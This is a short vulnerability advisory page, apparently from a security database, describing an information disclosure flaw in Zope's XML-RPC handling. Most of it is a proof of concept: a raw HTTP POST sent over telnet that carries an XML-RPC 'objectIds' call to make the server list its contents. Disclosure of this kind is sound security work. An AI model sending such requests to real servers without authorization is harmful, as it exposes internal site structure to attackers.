Zope Incorrect XML-RPC Request Information Disclosure Vulnerability

info
discussion
exploit
solution
references

Zope Incorrect XML-RPC Request Information Disclosure Vulnerability

The following proof of concept was provided:

telnet localhost 8080
POST /Documentation/comp_tut HTTP/1.0
Host: localhost
Content-Type: text/xml
Content-length: 93

<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>